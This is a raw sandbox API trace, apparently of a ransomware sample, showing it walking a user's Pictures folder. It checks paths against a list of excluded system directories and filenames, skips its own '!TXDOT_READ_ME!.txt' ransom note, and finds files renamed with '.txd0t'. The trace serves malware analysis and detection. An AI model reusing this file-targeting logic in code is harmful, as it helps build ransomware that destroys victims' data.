ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.241] StrCmpW (psz1="..", psz2=".") returned 1 [0090.241] StrCmpW (psz1="..", psz2="..") returned 0 [0090.241] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.241] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.241] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.241] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.241] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0090.241] GetProcessHeap () returned 0xe30000 [0090.241] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedac48 | out: hHeap=0xe30000) returned 1 [0090.241] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0090.241] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0090.241] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0090.241] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0090.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="crypt_detect") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="cryptolocker") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="ransomware") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0090.242] GetProcessHeap () returned 0xe30000 [0090.242] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xedac48 [0090.242] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\*" [0090.242] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2670 [0090.242] StrCmpW (psz1=".", psz2=".") returned 0 [0090.242] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.242] StrCmpW (psz1="..", psz2=".") returned 1 [0090.242] StrCmpW (psz1="..", psz2="..") returned 0 [0090.242] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524613ac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x524613ac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524ffa54, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.242] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.242] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.242] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt" [0090.242] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.242] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.242] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.242] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.243] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.243] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd323bc90, ftCreationTime.dwHighDateTime=0x1d5eb85, ftLastAccessTime.dwLowDateTime=0xea7abc60, ftLastAccessTime.dwHighDateTime=0x1d5edea, ftLastWriteTime.dwLowDateTime=0x52394f6d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8c8a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="6to-Do2T3Y6Ag.jpg.txd0t", cAlternateFileName="6TO-DO~1.TXD")) returned 1 [0090.243] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg.txd0t", psz2=".") returned 1 [0090.243] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg.txd0t", psz2="..") returned 1 [0090.243] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="6to-Do2T3Y6Ag.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t" [0090.243] PathFindExtensionW (pszPath="6to-Do2T3Y6Ag.jpg.txd0t") returned=".txd0t" [0090.243] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.243] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2704850, ftCreationTime.dwHighDateTime=0x1d5e90c, ftLastAccessTime.dwLowDateTime=0x87a14c10, ftLastAccessTime.dwHighDateTime=0x1d5efbd, ftLastWriteTime.dwLowDateTime=0x524ada4e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11e6a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="7ln6G64dp6.gif.txd0t", cAlternateFileName="7LN6G6~1.TXD")) returned 1 [0090.243] StrCmpW (psz1="7ln6G64dp6.gif.txd0t", psz2=".") returned 1 [0090.243] StrCmpW (psz1="7ln6G64dp6.gif.txd0t", psz2="..") returned 1 [0090.243] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="7ln6G64dp6.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t" [0090.243] PathFindExtensionW (pszPath="7ln6G64dp6.gif.txd0t") returned=".txd0t" [0090.243] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.243] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6ba20, ftCreationTime.dwHighDateTime=0x1d5ea6d, ftLastAccessTime.dwLowDateTime=0xf55c7820, ftLastAccessTime.dwHighDateTime=0x1d5e3c8, ftLastWriteTime.dwLowDateTime=0x5252e086, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4c6a, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", cAlternateFileName="AI_VKH~1.TXD")) returned 1 [0090.243] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", psz2=".") returned 1 [0090.243] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", psz2="..") returned 1 [0090.243] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t" [0090.243] PathFindExtensionW (pszPath="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned=".txd0t" [0090.244] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.244] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0090.244] StrCmpW (psz1="Camera Roll", psz2=".") returned 1 [0090.244] StrCmpW (psz1="Camera Roll", psz2="..") returned 1 [0090.244] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Camera Roll", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system32\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\local\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\boot\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\perflogs\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\programdata\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\drivers\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\wsus\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="crypt_detect") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="cryptolocker") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="ransomware") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\WINDOWS") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files") returned 0x0 [0090.244] GetProcessHeap () returned 0xe30000 [0090.244] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ca) returned 0xedb108 [0090.244] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0090.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", psz2="\\*", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*" [0090.245] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0090.245] StrCmpW (psz1=".", psz2=".") returned 0 [0090.245] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.245] StrCmpW (psz1="..", psz2=".") returned 1 [0090.245] StrCmpW (psz1="..", psz2="..") returned 0 [0090.245] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.245] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.245] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.245] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.245] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0090.245] GetProcessHeap () returned 0xe30000 [0090.245] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedb108 | out: hHeap=0xe30000) returned 1 [0090.245] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.245] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.245] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.245] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2093e810, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0x1b242240, ftLastAccessTime.dwHighDateTime=0x1d5ece0, ftLastWriteTime.dwLowDateTime=0x525ed1ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11122, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="dF_BgEryZj.gif.txd0t", cAlternateFileName="DF_BGE~1.TXD")) returned 1 [0090.245] StrCmpW (psz1="dF_BgEryZj.gif.txd0t", psz2=".") returned 1 [0090.245] StrCmpW (psz1="dF_BgEryZj.gif.txd0t", psz2="..") returned 1 [0090.245] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.245] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.245] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="dF_BgEryZj.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t" [0090.245] PathFindExtensionW (pszPath="dF_BgEryZj.gif.txd0t") returned=".txd0t" [0090.245] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.245] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744e5b30, ftCreationTime.dwHighDateTime=0x1d5e6bc, ftLastAccessTime.dwLowDateTime=0xcba39720, ftLastAccessTime.dwHighDateTime=0x1d5e819, ftLastWriteTime.dwLowDateTime=0x525a0c5d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f4d, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="F1oeE.png.txd0t", cAlternateFileName="F1OEEP~1.TXD")) returned 1 [0090.245] StrCmpW (psz1="F1oeE.png.txd0t", psz2=".") returned 1 [0090.245] StrCmpW (psz1="F1oeE.png.txd0t", psz2="..") returned 1 [0090.245] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.245] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.245] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="F1oeE.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t" [0090.245] PathFindExtensionW (pszPath="F1oeE.png.txd0t") returned=".txd0t" [0090.246] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 